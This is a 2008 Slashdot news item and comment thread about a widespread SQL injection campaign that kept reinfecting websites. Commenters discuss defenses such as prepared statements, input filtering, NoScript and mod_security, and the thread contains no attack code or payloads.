Forgot your password?
typodupeerror
Security The Internet

Relentless Web Attack Hard To Kill 218

Posted by kdawson
from the stay-dead-willya dept.
ancientribe writes "The thousands of Web sites infected by a new widespread SQL injection attack during the past few days aren't necessarily in the clear after they remove the malicious code from their sites. Researchers from Kaspersky Lab have witnessed the attackers quickly reinfecting those same sites all over again. Meanwhile, researchers at SecureWorks have infiltrated the Chinese underground in an attempt to procure a copy of the stealthy new automated tool being used in the attacks."
This discussion has been archived. No new comments can be posted.

Relentless Web Attack Hard To Kill

Comments Filter:
  • Whatever happened (Score:5, Insightful)

    by RaceProUK (1137575) on Wednesday November 12, 2008 @03:18PM (#25737111) Homepage
    to fixing the hole? It's like fixing a car coolant leak by pouring more water in the radiator.
    • Re: (Score:3, Informative)

      by compro01 (777531)

      AFAICT, they are patching the hole, they're just finding even more holes of the same type.

    • by gurps_npc (621217)
      The problem is, they don't have "a hole", they have swiss cheese. The reason they have swiss cheese is that the people responsible for securing their machines take 3 days to do something that should be done in ten minutes.
  • by sam0737 (648914) <sam@chowch[ ]om ['i.c' in gap]> on Wednesday November 12, 2008 @03:21PM (#25737171)

    At the end of the day it's the problem of plugins...I mean, besides the fact that the website is being infected, it's the flaws and vulnerabilities of the ActiveX/Browser plugins that allow this kind of activity to be profitable.

    Just yet another reason, besides bandwidth, to get Flashblock.

    And install as few as browsers plugins/ActiveX as possible.

  • noscript (Score:5, Informative)

    by Manfre (631065) on Wednesday November 12, 2008 @03:22PM (#25737191) Homepage Journal
    NoScript is one of the best ways to avoid viruses that are distributed from the web.
    • by NorQue (1000887)
      Until someone discovers an exploitable bug in noscript. ;)
    • by Bryansix (761547)
      If you want to break a shitload of websites like uhm say the custom CRM that I support for my company that our own developers write in ASP.NET!
    • No, it's not. (Score:4, Informative)

      by Bearhouse (1034238) on Wednesday November 12, 2008 @04:44PM (#25738399)

      Your're right to publicise a good product that I also use and reccommend. However:

      Most people that get caught by malware don't understand all these arcane details.

      Most people use IE, (no noscript here..) and blindly click 'OK' when they cannot see the porn.

      Bad web sites / pages don't just install viruses.*

    • Trust (Score:2, Insightful)

      by mfh (56)

      Okay keep using Noscript. I don't have a problem with that, but be warned that you are not fully protected by Noscript when the website you TRUST is attacked by an exploit like SQL injection, because YOU TRUST THAT WEBSITE.

      White-lists are better than no-lists, but they aren't perfect.

  • by Anonymous Coward

    SecureWorks: Can I have a copy of your super secret automated tool?

    ChineseUnderground: No...

  • Infected Websites (Score:4, Interesting)

    by sexconker (1179573) on Wednesday November 12, 2008 @03:26PM (#25737297)

    Can someone explain to me how websites get infected?

    Oh, that's right, running ads and other shit from shady people (directly or indirectly).

    I really wish websites would simply stop hosting foreign (not theirs, not trusted, not checked) code and content.

    • Just so we're clear, that includes flash and pdf.

    • by corsec67 (627446)

      Oh, that's right, running ads and other shit from shady people (directly or indirectly).

      The article says that the websites are getting hit with a sql injection [wikipedia.org] attack, so ads shouldn't be the problem, unless the ad server is vulnerable.

      This probably has nothing to do with ads and more to do with failing to validate user input. (Obligatory xkcd [xkcd.com] reference)

      • In this case, yes, but see above:

        I really wish websites would simply stop hosting foreign (not theirs, not trusted, not checked) code and content.

      • My understanding was that people are passing input as a big string and then turning that into queries instead of doing it the right way, which is passing parameters.

    • by Hatta (162192)

      I really wish websites would simply stop hosting foreign (not theirs, not trusted, not checked) code and content.

      I really wish websites would simply stop expecting me to run their code.

  • This disgusts me (Score:4, Insightful)

    by 77Punker (673758) <spencr04@NOSPAM.highpoint.edu> on Wednesday November 12, 2008 @03:28PM (#25737323)

    I develop web applications for a living right now and as someone who's only been in this game for a few months, this disgusts me. I already know how to prevent SQL injection with prepared statements. It's easy to do and requires no extra knowledge, so why doesn't everyone do this?

    • by Rycross (836649) on Wednesday November 12, 2008 @03:33PM (#25737411)

      The problem is a frightening amount of training material on the web uses concatenated SQL strings to teach SQL. Pull up your average PHP/.Net/Java SQL tutorial and odds are that it will be concatenating strings. Throw that in with the fact that roughly half of the programmers reading that are going to be below average, and there you go.

      • by Pope (17780) on Wednesday November 12, 2008 @03:41PM (#25737517)

        I'd say fully half of all the programmers are going to be below average...

      • by corsec67 (627446) on Wednesday November 12, 2008 @03:45PM (#25737569) Homepage Journal

        Throw that in with the fact that roughly half of the programmers reading that are going to be below average

        Um for anything that is approximately normally distributed,... half of the X are going to be below average. (Especially if it is a continuous variable and you use the median)

        • *woosh*
        • If you're going to show off, do it right.

          Many continuous distributions are not normally distributed, and no discrete distributions are. So don't understand the 'especially if it is a continuous variable' part. Should be 'only if'.

          He said the average, not the median. Sure, for a perfect normal distribution all 3 measures of central tendancy are the same - mean, median & mode. Of course, in real life this never happens.

          So the other AC got it right...'fully half if even number' is only right interpret

      • Re: (Score:3, Insightful)

        by CodeBuster (516420)

        Throw that in with the fact that roughly half of the programmers reading that are going to be below average, and there you go.

        That is what comes of outsourcing and offshoring especially, but there are still managers out there who refuse to acknowledge what I like to call the Iron Law of Software Development or more generally the Project Triangle [wikipedia.org] (good, fast, cheap...pick two).

        • by Rycross (836649)

          Well there are good offshore companies, but when a company off-shores they tend to do so to save money, which means they go for the cheap and crappy companies. Unfortunately, because a lot of these places are a growing market, there tend to be an abundance of the cheap places, who subsequently stock up on poor programmers. The hatchet of the market hasn't had opportunity to trim the fat yet. You'd see a lot of the same stuff going on if you looked at what some companies in the late 90's were producing in

    • by Yetihehe (971185)
      It's very often simple laziness. In latest project which I'm working on I did one function: function q($str). It's even easier to use than prepared statements, it just filters everything not supposed to be there. But why other dev's don't always use it is beyound me.
      • by deraj123 (1225722)
        This is really not an appropriate solution. "everything not supposed to be there" relies on knowing what isn't supposed to be there. If you know exactly what's supposed to be there in the first place, why even have dynamic queries? Besides, is concatenating my query in code really easier than defining a query with parameters, and then just copying the parameters from the input form to the query? I've yet to see a filtering function that provides the same level of security as PreparedStatements.
        • by profplump (309017)

          I agree that parameterized statements are the way to go, but in many cases it *is* pretty easy to filter input that shouldn't be present, and using both techniques together can provide protection from things other than SQL injection.

          In many instances you may simply be able to allow only \w or \w\s\.\- without ever destroying valid input. Even if you have wider input requirements it's often possible to drop anything outside the normal printable range and any quoting characters (where "quoting characters" may

          • by deraj123 (1225722)

            Yes, in some cases it is possible. However, I would argue that it is much more likely that you will either miss something that is harmful, or inadvertently place unnecessary restrictions on input.

            I should note that I don't consider parameterized statements to be a replacement for input validation. You should still make sure that your input makes sense for the data it is supposed to represent. However, filtering for "harmful characters" really shouldn't need to be a part of this.

  • Install a proxy (Score:5, Interesting)

    by gfilion (80497) on Wednesday November 12, 2008 @03:35PM (#25737443) Homepage

    We had this problem a few months back at work. Old but necessary asp web sites kept getting infected. It only took a few hours to install a reverse proxy with mod_security on EC2 and we were in the clear.

    Full story on my blog:
    http://guillaume.filion.org/blog/archives/2008/05/i_love_ec2_and_rightscale.php [filion.org]

    • Re:Install a proxy (Score:4, Informative)

      by merreborn (853723) on Wednesday November 12, 2008 @04:56PM (#25738573) Journal

      mod_security is a reactive security measure. It's blacklist based, which makes the classic error of attempting to "enumerate badness" [ranum.com].

      While it's great if you've identified an existing threat to an application you cannot properly secure, it does nothing to protect you against future attacks using less obvious techniques.

      mod_security alone is not an adequate solution. It's still necessary to proactively write secure applications in the first place, which means making sure you're never allowing raw, unfiltered/unescaped user data into places where it shouldn't go.

  • by Aoet_325 (1396661) on Wednesday November 12, 2008 @03:36PM (#25737453)

    "The toolkit is protected with a layer of digital rights management and appears to be sold mainly in China. "

    this is why I don't believe in "Tusted" computing.
    When software or hardware are used to take control of a computer away from that computer's owner bad things will happen.

    • lol,

      When software or hardware are used to take control of a computer away from that computer's owner bad things will happen.

      ... on an article about viruses. Yes well done, +1 Insightful. Never mind that trusted computing != DRM and that the most common use of TC is for security software, doh.

  • by AragornSonOfArathorn (454526) on Wednesday November 12, 2008 @03:39PM (#25737501)

    Is it like Big Trouble in Little China, with the lightning ninjas and floating eye thing? Did they get Kurt Russel to help?

    If so, that would be AWESOME.

    • by Hatta (162192)

      This Relentless web attack sounds more like a Little Big Adventure to me.

  • by genner (694963) on Wednesday November 12, 2008 @03:53PM (#25737685)
    Did everyone miss the fact that the toolkit resposible includes some hefty DRM.

    Where's the outrage?
    Why aren't we demmanding an open source solution?
  • Sure! They can block users from nasty ol' Capitolist porn. But, do they keep users from attacking overseas networks? Noooooo.

    Sorry. I'm in touch with my inner child today.

  • "researchers at SecureWorks have infiltrated the Chinese underground in an attempt to procure a copy of the stealthy new automated tool being used in the attacks"

    I wish my job description sounded as exciting as this one.

  • I keep seeing "SQL injection", but injection into what? PHP? ASP? Plesk? Something else? Specific scripts, or the language engine itself?

    • by shawnce (146129)

      "I keep seeing "SQL injection", but injection into what?" ...into anything that will then turn around and execute the tainted SQL query (dynamically generated).

  • McColo? (Score:3, Insightful)

    by Ungrounded Lightning (62228) on Wednesday November 12, 2008 @06:18PM (#25739627) Journal

    I wonder how many of the malicious servers the injected SQL dumped the users into were hosted on McColo - and are thus now not available?

  • Seriously, SQL Injection is one of the simplest attack vectors to prevent. If you can't prevent SQL injection, you should not be allowed to write a web application.

"Just Say No." - Nancy Reagan "No." - Ronald Reagan

Working...